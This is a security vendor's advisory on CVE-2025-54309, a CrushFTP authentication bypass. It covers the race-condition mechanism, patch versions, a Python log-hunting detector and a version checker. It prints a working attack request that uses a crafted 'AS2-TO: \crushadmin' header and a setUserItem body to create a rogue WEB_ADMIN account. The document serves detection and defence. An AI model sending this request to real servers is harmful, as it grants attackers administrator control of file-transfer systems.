CVE-2025-54309 is an authentication bypass in CrushFTP. An attacker can bypass authentication and create an administrator account by sending a request carrying a crafted AS2-TO header and, within a short time interval, a separate administrator-account-creation request. A patch for this vulnerability was released on July 18, 2025. Our AIWAF product will address this issue with the "CrushFTP Authentication Bypass" pattern, which is planned for inclusion in the September 2025 pattern update.
1. Overview
CrushFTP is a cross-platform file-transfer server that supports FTP, SFTP, HTTP/S, WebDAV, and other protocols. It is used by individuals and organizations of various sizes. This report summarizes analysis of the recent authentication-bypass vulnerability CVE-2025-54309 discovered in the product.
Source : https://www.crushftp.com/index.html
2. Attack Type
CVE-2025-54309 was disclosed alongside the patch CrushFTP released in July 2025 and was quickly added to catalogs of vulnerabilities with confirmed in-the-wild exploitation.
This vulnerability is a race-condition-based authentication bypass that abuses weak validation in the server's AS2 protocol handling. The attacker sets the AS2-TO header of a request to \crushadmin (the name of the built-in administrator account, prefixed with a backslash), which can cause the request's session to be elevated to that internal administrator account. The crafted request on its own does not let the attacker act with those privileges. If the attacker immediately follows it with a separate administrator-account-creation request, however, the two requests can race so that the account-creation operation executes in the elevated (built-in administrator) context, and a new administrative account is created. Because the window is short, the two requests arrive back to back from the same client, which is also what makes the pair recognizable in request logs.
Example attack request (note that this capture carries both the AS2-TO header and the setUserItem account-creation command in a single request; some values are censored):
POST /WebInterface/function/ HTTP/1.1
Host: www.test.com
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
AS2-TO: \crushadmin
Content-Type: disposition-notification
X-Requested-With: XMLHttpRequest
Cookie: CrushAuth=1755628505894_6BIIu82Vk0lI9naqUFa0zdjXuOZgDeQ5; currentAuth=DeQ5
Content-Length: 785
command=setUserItem&data_action=new&serverGroup=MainUsers&username=testing_hacker&user=<?xml version="1.0" encoding="UTF-8"?><user type="properties"><max_logins_ip>8</max_logins_ip><real_path_to_user>./users/MainUsers/crushadmin/</real_path_to_user><root_dir>/</root_dir><user_name>CENSORED</user_name><version>1.0</version><max_logins>0</max_logins><last_logins>03/28/2025 03:00:26 PM</last_logins><password>NEWPASSWORD</password><site>(CONNECT)(WEB_ADMIN)</site><ignore_max_logins>true</ignore_max_logins><max_idle_time>0</max_idle_time><username>CENSORED</username></user>&xmlItem=user&vfs_items=<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>&permissions=<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(view)(resume)</item></VFS>&c2f=DeQ5
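One way to hunt for this request pair in HTTP request logs, added here as an example that is not part of the original report and is not the AIWAF pattern. It assumes you have raw requests with a timestamp and client address, as a reverse proxy or full-capture log would provide; the traffic below is constructed, modeled on the request format shown above. It flags an AS2-TO header that names crushadmin (after stripping the leading backslash), a setUserItem request that creates a new user with the WEB_ADMIN site flag, and the race pattern itself: both indicators from the same client within a short window, in either order, or combined in one request as in the capture above. The two-second window, the header normalization and the sample hostnames and addresses are assumptions, not values from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample traffic, not real captures: (timestamp in seconds, client IP, raw request).
# Records 2 and 3 model the race pair; record 4 is a legitimate admin creating a WEB_ADMIN user.
SAMPLE_TRAFFIC = [
    (1000.000, "198.51.100.7",
     "GET /WebInterface/ HTTP/1.1\r\n"
     "Host: ftp.example.test\r\n"
     "User-Agent: Mozilla/5.0\r\n"
     "\r\n"),
    (1001.000, "203.0.113.10",
     "POST /WebInterface/function/ HTTP/1.1\r\n"
     "Host: ftp.example.test\r\n"
     "User-Agent: python-requests/2.32.3\r\n"
     "AS2-TO: \\crushadmin\r\n"
     "Content-Type: disposition-notification\r\n"
     "Content-Length: 0\r\n"
     "\r\n"),
    (1001.250, "203.0.113.10",
     "POST /WebInterface/function/ HTTP/1.1\r\n"
     "Host: ftp.example.test\r\n"
     "User-Agent: python-requests/2.32.3\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "\r\n"
     "command=setUserItem&data_action=new&serverGroup=MainUsers&username=testing_hacker"
     "&user=<user type=\"properties\"><site>(CONNECT)(WEB_ADMIN)</site></user>&xmlItem=user"),
    (2000.000, "192.0.2.44",
     "POST /WebInterface/function/ HTTP/1.1\r\n"
     "Host: ftp.example.test\r\n"
     "Cookie: CrushAuth=REDACTED; currentAuth=REDACTED\r\n"
     "\r\n"
     "command=setUserItem&data_action=new&serverGroup=MainUsers&username=bob"
     "&user=<user type=\"properties\"><site>(CONNECT)(WEB_ADMIN)</site></user>&xmlItem=user"),
]

# A <site> element granting the WEB_ADMIN flag, as in the captured user XML above.
ADMIN_SITE_RE = re.compile(r"<site>[^<]*\(WEB_ADMIN\)[^<]*</site>")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lower-cased."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines() or [""]
    method, path = (lines[0].split(" ") + ["", ""])[:2]
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def as2_to_targets_admin(headers: dict) -> bool:
    """True when an AS2-TO header names crushadmin once the backslash (or slash) decoration
    seen in the wild is stripped. The normalization is an assumption, not from the advisory."""
    value = headers.get("as2-to")
    if value is None:
        return False
    return unquote(value).strip().strip("\\/").lower() == "crushadmin"


def admin_user_creation(body: str):
    """Return the username if the body is a setUserItem/data_action=new request whose user XML
    grants WEB_ADMIN; otherwise None. Works on both raw and percent-encoded XML."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("command", [""])[0] != "setUserItem":
        return None
    if params.get("data_action", [""])[0] != "new":
        return None
    if not ADMIN_SITE_RE.search(params.get("user", [""])[0]):
        return None
    return params.get("username", [""])[0]


def find_attack_patterns(traffic, window: float = 2.0):
    """Walk (timestamp, ip, raw) records in time order and emit findings as dicts.
    'race_pair' fires when the same client sends an AS2-TO=crushadmin request and a WEB_ADMIN
    user creation within `window` seconds (either order), or both in one request."""
    findings, last_as2, last_create = [], {}, {}
    for ts, ip, raw in sorted(traffic, key=lambda r: r[0]):
        _, _, headers, body = parse_request(raw)
        as2_hit = as2_to_targets_admin(headers)
        new_admin = admin_user_creation(body)
        if as2_hit:
            findings.append({"kind": "as2_to_crushadmin", "ip": ip, "ts": ts, "username": None})
            last_as2[ip] = ts
        if new_admin is not None:
            findings.append({"kind": "web_admin_user_created", "ip": ip, "ts": ts, "username": new_admin})
            last_create[ip] = (ts, new_admin)
        if as2_hit and new_admin is not None:
            findings.append({"kind": "race_pair", "ip": ip, "ts": ts, "username": new_admin})
        elif as2_hit and ip in last_create and ts - last_create[ip][0] <= window:
            findings.append({"kind": "race_pair", "ip": ip, "ts": ts, "username": last_create[ip][1]})
        elif new_admin is not None and ip in last_as2 and ts - last_as2[ip] <= window:
            findings.append({"kind": "race_pair", "ip": ip, "ts": ts, "username": new_admin})
    return findings


if __name__ == "__main__":
    for finding in find_attack_patterns(SAMPLE_TRAFFIC):
        print(finding)
```

A lone WEB_ADMIN creation (record 4) is reported only as informational, since administrators do create other administrators; the AS2-TO indicator and the race pair are the signals worth paging on. Tune the window to your proxy's timestamp resolution.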
3. Mitigation Measures
CrushFTP released a patch for CVE-2025-54309 on July 18, 2025. Researchers who analyzed the vulnerability report that it was being exploited in the wild before the patch was published, and some analysts have noted the gap between the first observed abuse and patch availability. If you operate CrushFTP, confirm the installed version and upgrade to 10.8.5 (10.x branch) or 11.3.4_23 (11.x branch) or later; the 11.x fix is identified by the build suffix, so earlier 11.3.4 builds without the _23 suffix are still affected. Because successful exploitation leaves behind a new administrator account, also review the server's user list for accounts you did not create.
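A version check for the fixed builds named above, added here as an example that is not part of this report or of CrushFTP's own tooling. It takes a version string read from your installation (how you obtain it is up to you) and compares it per branch against 10.8.5 and 11.3.4_23. The point is the _23 build suffix: a plain dotted-version comparison would treat 11.3.4 as equal to 11.3.4_23 and call an affected build patched. Branches the advisory does not name (anything other than 10.x and 11.x) are reported as not covered rather than as safe.

```python
import re

# Earliest fixed builds per major branch, as stated in the CrushFTP advisory cited above.
FIXED_VERSIONS = {10: "10.8.5", 11: "11.3.4_23"}


def parse_version(text: str) -> tuple:
    """Turn a CrushFTP version string such as '11.3.4_23' into a comparable tuple (11, 3, 4, 23).
    A missing '_NN' build suffix counts as build 0, so a plain '11.3.4' sorts below '11.3.4_23'."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)(?:_(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognized CrushFTP version string: {text!r}")
    return tuple(int(g or 0) for g in m.groups())


def is_patched(text: str):
    """True if the version carries the CVE-2025-54309 fix, False if it is an affected
    10.x or 11.x build, None for a branch the advisory does not cover."""
    version = parse_version(text)
    fixed = FIXED_VERSIONS.get(version[0])
    if fixed is None:
        return None
    return version >= parse_version(fixed)


if __name__ == "__main__":
    for v in ["10.8.4", "10.8.5", "11.3.4", "11.3.4_22", "11.3.4_23", "11.3.5"]:
        state = is_patched(v)
        print(v, "patched" if state else ("not covered" if state is None else "AFFECTED"))
```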
Our AIWAF product will mitigate this vulnerability via the "CrushFTP Authentication Bypass" pattern planned for the September 2025 pattern update.
Source : https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
4. Conclusion
CrushFTP is a cross-platform file-transfer server used by individuals, SMBs, and some larger organizations. CVE-2025-54309 has confirmed exploitation cases and ongoing attack attempts; customers using this product should therefore apply the available updates promptly and move to patched versions. Our Threat Analysis (TA) team continues to monitor vulnerabilities affecting CrushFTP and will respond rapidly to new related findings.

